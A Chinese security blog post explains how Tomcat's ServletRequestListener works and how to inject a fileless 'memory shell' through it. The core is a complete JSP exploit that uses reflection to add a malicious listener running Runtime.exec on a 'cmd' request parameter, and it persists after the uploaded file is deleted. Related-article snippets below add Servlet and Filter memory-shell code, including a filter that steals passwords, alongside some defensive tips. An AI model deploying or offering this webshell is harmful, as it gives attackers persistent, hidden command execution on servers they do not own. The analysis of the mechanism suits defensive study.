Listener内存马

最新推荐文章于 2025-01-22 19:54:31 发布
原创 最新推荐文章于 2025-01-22 19:54:31 发布 · 243 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#网络安全 #web安全 #安全 #计算机网络 #系统安全 #安全架构 #网络攻击模型

本文详细解释了JavaWeb中的Listener机制,重点介绍了如何利用ServletRequest对象注入恶意代码创建内存马,包括Listener的注册流程、代码实现和攻击思路。

0x01 什么是Listener内存马

什么是Listener

和 Filter 一样,监听器是 JavaWeb 三大组件之一。它是一个实现特定接口的java程序,这个程序用于监听web应用中的一些对象,信息的创建,添加,销毁等,然后针对于这些情况做出相应处理。总结来说,就是在application,session,request三个对象创建消亡或者往其中添加修改删除属性时自动执行代码的功能组件。

Listener的三大域对象

监听器有三个域对象,指的是在监听器中可以访问的特定范围内的数据对象。分别为

ServletContext域对象——用于在整个 Java Web 应用程序中共享数据、资源和配置信息。

ServletRequest域对象——用于在一次 HTTP 请求处理期间共享数据和信息。

HttpSession域对象——用于在用户会话期间存储和共享数据,跨足够长的时间间隔保持信息状态。

根据不同域对象的功能,很明显 ServletRequest 类型是适合注入内存马的,我们注入一个有恶意代码的ServletRequest类型的监听器,当有HTTP请求处理时,注入的监听器就会发挥作用,执行恶意代码,这就是Listener内存马。

0x02 代码实现

创建一个ServletRequest类型的监听器,继承 ServletRequestListener 接口,需要重写requestInitialized方法,和过滤器的doFilter方法一样,requestInitialized方法也是处理监听器业务的方法。

package Listener;

import javax.servlet.ServletRequestEvent;
import javax.servlet.ServletRequestListener;

public class MyListener implements ServletRequestListener {
@Override
public void requestInitialized(ServletRequestEvent sre){
System.out.println("Listener被执行");

}
}

代码很短,只用作测试,同时需要修改 web.xml 配置文件。

<listener>
<listener-class>Listener.MyListener</listener-class>
</listener>

启动服务器。

1.png

可以在日志中看到输出信息,监听器被调用,requestInitialized方法被执行。

0x03 流程分析

想要成功注册Listener内存马,必须要了解Listener的生成以及调用

读取配置文件

在应用启动的时候,ContextConfig 类首先会去读取配置文件,主要方法是configureContext,在这个方法下个断点.

3.png

首先确定 Servlet 上下文的配置信息,然后会遍历这个xml配置文件里的Filter和Listener,这里遍历到MyListener这个监听器,然后调用 StandardContext 的 addApplicationListener 方法,跟进。

4.png

在这之前做一些检查,检查是否存在相同的监听器,然后整合起来,把它赋值为 applicationListeners 数组里,到这调试就结束,只要知道解析完web.xml里的Listener后,会把解析完的监听器添加到applicationListeners 数组里就够了。

Listener被调用

读取配置文件之后,StandardContext 会首先调用 listenerStart 方法,经过一些检查,然后开启监听。

断点不能直接下在requestInitialized方法里,因为流程差不多调用完了,没东西了。把断点下在StandardContext类的fireRequestInitEvent方法里。

2.png

开始调试。

5.png

跟进 getApplicationEventListeners 方法。

6.png

获取存放监听器的数组,查找用法,看看什么地方调用了 applicationEventListenersList。

7.png

这个方法是将监听器放进这个数组里,继续往下看。

8.png

对监听器数组进行遍历,判断是否继承了 ServletRequestListener 接口,最终调用 requestInitialized 方法,到此分析流程结束。

0x04 攻击思路与exp编写

回想分析流程,遍历监听器数组,然后调用,我们的目标是将自己构造的Listener添加到数组中去,也就是 addApplicationEventListener 方法,通过反射将恶意的Listener添加进去。还是首先构造上下文,也就是 StandardContext 通过执行流找到上下文生成的地方。

9.png

这里通过 request 对象来创建,JSP内置了request对象,通过反射构造 StandardContext 对象。

ServletContext servletContext =  request.getServletContext();  
Field applicationContextField = servletContext.getClass().getDeclaredField("context");  
applicationContextField.setAccessible(true);  
ApplicationContext applicationContext = (ApplicationContext) applicationContextField.get(servletContext);  

Field standardContextField = applicationContext.getClass().getDeclaredField("context");  
standardContextField.setAccessible(true);  
StandardContext standardContext = (StandardContext) standardContextField.get(applicationContext);

然后编写一个恶意的Listener,最终写个jsp,完整exp(贴上师傅代码)。

<%@ page import="org.apache.catalina.core.StandardContext" %>  
<%@ page import="java.util.List" %>  
<%@ page import="java.util.Arrays" %>  
<%@ page import="org.apache.catalina.core.ApplicationContext" %>  
<%@ page import="java.lang.reflect.Field" %>  
<%@ page import="java.util.ArrayList" %>  
<%@ page import="java.io.InputStream" %>  
<%@ page import="org.apache.catalina.connector.Request" %>  
<%@ page import="org.apache.catalina.connector.Response" %>  
<%!  

class ListenerMemShell implements ServletRequestListener {  

@Override  
public void requestInitialized(ServletRequestEvent sre) {  
String cmd;  
try {  
cmd = sre.getServletRequest().getParameter("cmd");  
org.apache.catalina.connector.RequestFacade requestFacade = (org.apache.catalina.connector.RequestFacade) sre.getServletRequest();  
Field requestField = Class.forName("org.apache.catalina.connector.RequestFacade").getDeclaredField("request");  
requestField.setAccessible(true);  
Request request = (Request) requestField.get(requestFacade);  
Response response = request.getResponse();  

if (cmd != null){  
InputStream inputStream = Runtime.getRuntime().exec(cmd).getInputStream();  
int i = 0;  
byte[] bytes = new byte[1024];  
while ((i=inputStream.read(bytes)) != -1){  
response.getWriter().write(new String(bytes,0,i));  
response.getWriter().write("\r\n");  
}  
}  
}catch (Exception e){  
e.printStackTrace();  
}  
}  
}  
%>  

<%  
//获取standardContext上下文
ServletContext servletContext =  request.getServletContext();  
Field applicationContextField = servletContext.getClass().getDeclaredField("context");  
applicationContextField.setAccessible(true);  
ApplicationContext applicationContext = (ApplicationContext) applicationContextField.get(servletContext);  

Field standardContextField = applicationContext.getClass().getDeclaredField("context");  
standardContextField.setAccessible(true);  
StandardContext standardContext = (StandardContext) standardContextField.get(applicationContext);  

Object[] objects = standardContext.getApplicationEventListeners();  
List<Object> listeners = Arrays.asList(objects);  
List<Object> arrayList = new ArrayList(listeners);  
arrayList.add(new ListenerMemShell());  
standardContext.setApplicationEventListeners(arrayList.toArray());  

%>

上传jsp文件。

10.png

成功执行,即使文件删除,仍然可以执行命令。

Java Tomcat内存——Listener内存
m0_61506558的博客
12-01 945
监听器 Listener 是一个实现特定接口的 Java 程序,这个程序专门用于监听另一个 Java 对象的方法调用或属性改变,当被监听对象发生上述事件后,监听器某个方法将立即自动执行。事件:方法调用、属性改变、状态改变等。事件源:被监听的对象( 例如:request、session、servletContext)。监听器:用于监听事件源对象 ,事件源对象状态的变化都会触发监听器。注册监听器:将监听器与事件源进行绑定监听对象创建和销毁的监听器监听对象中属性变更的监听器。
tomcat Listener 内存浅谈
无问社区的博客
08-15 1119
Tomcat的主要功能toncat作为一个web服务器,实现了两个核心的功能http 服务器功能:进行socket 通信(基于TCP/IP),解析HTTP 报文Servlet 容器功能:加载和管理Servlet ,由Servlet 具体负责处理Rqeusts 请求以上两个功能对应着tomcat的两个核心组件,分别是连接器(Connector)和容器(Container),连接器负责对外交流(完成http服务器功能),容器负责内部处理(完成Servlet容器功能)
Tomcat-Listener内存
01-15 454
这篇文章记录下学习 Listener 内存学习到的东西,思路跟 Filter 型内存差不多,找一个相对通用的 Listener ,这里用的是 `ServletRequestListener` ,所有的 servlet 请求都会经过这个 Listener,接下来写一个例子调试分析 Listener 的注册过程和调用过程,相对来说比较简单!
深入底层源码的Listener内存(内存系列篇三)
m0_71746299的博客
01-27 474
写在前面 继前面的Filter``Servlet内存技术,这是系列文章的第三篇了,这篇将给大家带来的是Listener内存技术。 前置 什么是Listener? 监听器 Listener 是一个实现特定接口的 Java 程序,这个程序专门用于监听另一个 Java 对象的方法调用或属性改变,当被监听对象发生上述事件后,监听器某个方法将立即自动执行。 监听器的相关概念: 事件:方法调用、属性改变、状态改变等。 事件源:被监听的对象( 例如:request、session、servletContext)。
Tomcat Java内存 listener
qq_40710190的博客
07-20 353
针对Tomcat Listener内存
java内存学习记录(一)Tomcat Listener内存
AsagiRiAsagi的博客
03-18 424
这里的request是org.apache.catalina.connector.Request,实现了HttpServletRequest接口,因为jsp本质是servlet,可以直接调用。接口的监听器一般作用于tomcat初始化启动阶段,此时客户端的请求还没进入解析阶段,不适合用于内存。Request类型的Listener触发难度比较低,直接访问就可以,适合注册作为内存Listener是最先被加载的,Listener分以下几种。接口应用于各个对象事件的监听,有许多继承它的接口。
Tomcat容器攻防笔记之Listener内存 .pdf
09-05
【Tomcat容器攻防笔记之Listener内存】 在网络安全领域,尤其是系统安全和漏洞分析方面,攻击者和防御者之间的较量日益激烈。随着技术的进步,包括AI和网络信息安全在内的多种安全措施已经部署,如WAF动态防御、...
S07-tomcat之Listener内存1
08-03
然而,需要注意的是,不恰当的使用或恶意利用Listener可能会导致安全风险,如文中提到的“注入内存”。这通常是指通过Listener在服务器端植入恶意代码,使其在特定条件下执行,从而影响系统的安全性。 总之,...
Tomcat内存学习3:Listener
weixin_43263451的博客
07-24 817
上一篇讲了servlet型内存,而这次这个Listener内存也是大同小异,就是在内存中恶意创建一个Listener供攻击者使用必须搞懂Listener的加载机制在此加载机制基础上,设计出Listener内存poc。
[Java安全]—Tomcat Listener内存
Sentiment的博客
07-14 3429
内存,也被称为无文件,是无文件攻击的一种常用手段。而无文件攻击呢顾名思义就是不利用shell文件进行攻击,但这里的无文件并不是真的意义上的“无文件”,而是一种攻击思路,是将恶意文件内容以脚本形式存在计算机中的内存、注册表子项目中或者利用系统合法工具以逃避安全检测的方法。servlet-api类○ listener型○ filter型○ servlet型spring类○ 拦截器○ controller型Java Instrumentation类○ agent型顾名思义就是监听器,他能够监听一些事件从而来达
引入tomcat_Tomcat容器攻防笔记之Listener内存
weixin_35348182的博客
01-09 916
欢迎光临鲸落的杂货铺原文首发于安全客-安全资讯平台https://www.anquanke.com/post/id/226769(图自喜欢的古风插画家:微博@伊吹鸡腿子)背景: 基于现阶段红蓝对抗强度的提升,诸如WAF动态防御、态势感知、IDS恶意流量分析监测、文件多维特征监测、日志监测等手段,能够及时有效地检测、告警甚至阻断针对传统通过文件上传落地的Webshell或...
Java内存基础(一)--三大件(Servlet、Filter、Listener
qq_32885471的博客
06-04 1264
Servlet 是一个用Java 编写的程序,此程序在服务器上运行以处理客户端请求。
『Java安全』Tomcat内存_动态注册Listener内存
Ho1aAs‘s Blog
03-24 2044
『Java安全』反序列化- 文章目录前言Tomcat Servlet API Listener介绍ServletRequestListener介绍ServletRequestListener调用流程分析1. Request创建时2. Request销毁时Listener内存原理Ⅰ.获取contextⅡ. 生成恶意Listener获取ResponseⅢ. add添加listener完整代码参考引用完 前言 Tomcat Servlet API Listener介绍 Listener监听器用来监听对象创建、销
一文深度学习java内存
jxiang213的博客
10-25 1416
java内存注入一般分为两种动态注册添加新的listener/filter/servlet/controller等等agent注入修改已有class,插入恶意代码在理解内存注入前,有几个概念需要掌握的。类加载双亲委派问题以及context类反射。
200道网络安全常见面试题合集(附答案解析+配套资料)
qq_53058639的博客
07-11 457
利用虚拟机软件或者虚拟机中运行的软件的漏洞进行攻击,以达到攻击或控制虚拟机宿主操作系统的目的通过“回车”和“换行”字符注入HTTP流,实现网站篡改、跨站脚本、劫持等。这里只写常利用的漏洞IIS6.0 PUT漏洞IIS6.0 远程代码执行漏洞IIS6.0 解析漏洞IIS启用.net 短文件名漏洞IIS7.0/7.5 解析漏洞未知扩展名解析漏洞配合错误导致的解析漏洞、目录遍历配置错误导致的解析漏洞、目录遍历配置错误导致的任意代码执行、任意文件写入漏洞弱口令+管理后台war包部署getshell。
护网面试-JAVA漏洞和中间件篇
qq_52579508的博客
04-17 675
中间件IIS漏洞IIS PUT漏洞IIS Server 在 Web 服务扩展中开启了 WebDAV ,配置了可以写入的权限,造成任意文件上传。版本:IIS6.0短文件名猜解漏洞IIS的短文件名机制,可以暴力猜解短文件名,访问构造的某个存在的短文件名,会返回404,访问构造的某个不存在的短文件名,返回400。局限性1) 此漏洞只能确定前6个字符,如果后面的字符太长、包含特殊字符,很难猜解;2) 如果...
红蓝对抗-HW红蓝队基本知识(含网安学习的全部路线)
logic1001的博客
01-22 1101
红队,一般是指网络实战攻防演习中的攻击一方。红队一般会采用针对目标单位的从业人员,以及目标系统所在网络内的软件、硬件设备同时执行多角度、全方位、对抗性的混合式模拟攻击手段;通过技术手段实现系统提权、控制业务、获取数据等渗透目标,来发现系统、技术、人员、管理和基础架构等方面存在的网络安全隐患或薄弱环节。红队人员并不是一般意义上的电脑黑客。因为黑客往往以攻破系统,获取利益为目标;而红队则是以发现系统薄弱环节,提升系统安全性为目标。
问题是内存,答案是servlet,filter,listener,这是什么意思?
最新发布
03-27
<think>嗯,用户问的问题是关于内存的,答案提到了Servlet、Filter和Listener,这是什么意思呢?首先,我需要回忆一下内存的相关知识。内存通常指的是存在于内存中的恶意后门程序,它们利用中间件的组件来实现持久化的攻击。常见的Java Web应用中,Servlet、Filter和Listener是三个核心组件,攻击者可能会将它们作为内存的载体。 用户可能是在学习或工作中遇到了内存的问题,需要理解为什么答案中会提到这三个组件。我需要确认这三个组件在内存中的作用。比如,Filter通常用于拦截请求,攻击者可能注册一个恶意Filter来截取用户请求;Servlet处理HTTP请求,恶意Servlet可以接收攻击者的指令;Listener监听应用事件,可能用来在应用启动时注入恶意代码。 接下来,要组织回答的结构,先解释内存的概念,然后分别介绍Servlet、Filter和Listener在其中的作用。同时,用户可能需要了解如何防御这种内存,所以补充防御措施会更好。需要注意用户可能的技术水平,避免使用过于专业的术语,但又要准确。 可能还需要检查是否有遗漏的组件,比如Valve或者Interceptor,但根据答案,用户的问题明确提到了Servlet、Filter、Listener,所以应集中在这三个。另外,要确保解释清楚为什么这三个组件会被利用,比如它们的执行时机和权限。 最后,确保回答符合之前的格式要求,分步骤说明,结构清晰,使用中文,并且行内公式正确(如果有的话)。不过这个问题可能不涉及数学公式,但需要保持LaTeX格式的正确性,如果有代码示例的话。不过用户的问题主要涉及概念,可能不需要代码,但需要简明扼要的解释。</think>### **内存利用Servlet、Filter、Listener的原理** **内存(Memory Shell)**是一种驻留在服务器内存中的恶意后门程序,通过篡改中间件(如Tomcat、Spring)的核心组件实现持久化攻击。攻击者通常会利用Servlet、Filter、Listener这三个Java Web核心组件注入恶意代码。以下是具体解释: --- #### **1. Servlet内存** - **原理**: Servlet是处理HTTP请求的核心组件。攻击者通过动态注册一个恶意Servlet,并映射到特定路径(如`/evil`),使得访问该路径时触发恶意代码。 - **攻击步骤**: 1. 利用漏洞(如反序列化、文件上传)注入恶意类。 2. 调用`ServletContext.addServlet()`动态注册Servlet。 3. 绑定到高优先级路径(如`/`),拦截所有请求。 - **示例代码**: ```java // 创建恶意Servlet类 public class EvilServlet extends HttpServlet { protected void doGet(HttpServletRequest req, HttpServletResponse resp) { // 执行恶意操作(如执行系统命令) String cmd = req.getParameter("cmd"); Runtime.getRuntime().exec(cmd); } } // 动态注册Servlet ServletContext context = req.getServletContext(); ServletRegistration.Dynamic evilServlet = context.addServlet("evil", EvilServlet.class); evilServlet.addMapping("/evil"); ``` --- #### **2. Filter内存** - **原理**: Filter用于拦截请求和响应。攻击者注册恶意Filter并设置最高优先级,可窃取敏感数据或修改响应。 - **攻击步骤**: 1. 注入Filter恶意类。 2. 通过`FilterRegistration.Dynamic`动态注册Filter。 3. 设置`dispatcherTypes=REQUEST`覆盖所有请求。 - **示例代码**: ```java // 创建恶意Filter类 public class EvilFilter implements Filter { public void doFilter(ServletRequest req, ServletResponse res, FilterChain chain) { // 窃取请求参数(如密码) String password = req.getParameter("password"); sendToAttacker(password); chain.doFilter(req, res); } } // 动态注册Filter FilterRegistration.Dynamic evilFilter = context.addFilter("evil", EvilFilter.class); evilFilter.addMappingForUrlPatterns(EnumSet.of(DispatcherType.REQUEST), true, "/*"); ``` --- #### **3. Listener内存** - **原理**: Listener用于监听Web应用事件(如会话创建、请求初始化)。攻击者注入恶意Listener,在事件触发时执行代码(如反弹Shell)。 - **常见利用场景**: - `ServletRequestListener`:监听HTTP请求。 - `HttpSessionListener`:监听会话创建。 - **示例代码**: ```java // 创建恶意Listener类 public class EvilListener implements ServletRequestListener { public void requestInitialized(ServletRequestEvent sre) { // 在请求到达时触发恶意代码 executeMaliciousCommand(); } } // 动态注册Listener context.addListener(EvilListener.class); ``` --- ### **内存防御措施** 1. **禁止动态注册组件**: 通过安全策略限制`ServletContext.addServlet()`、`addFilter()`等方法的调用。 2. **运行时监控**: 使用工具(如Java Agent)检测异常的Servlet/Filter/Listener注册行为。 3. **代码审计**: 检查项目中是否存在非官方或未签名的类动态加载。 4. **依赖安全更新**: 修复中间件漏洞(如Tomcat Ghostcat、Spring RCE),避免攻击者利用漏洞注入内存。 --- ### **总结** - **Servlet/Filter/Listener内存**的本质是攻击者通过篡改Web核心组件,将恶意代码融入正常业务逻辑。 - 防御需从**代码安全**、**运行监控**、**漏洞修复**三方面入手,阻断注入路径。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

AI小模型

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值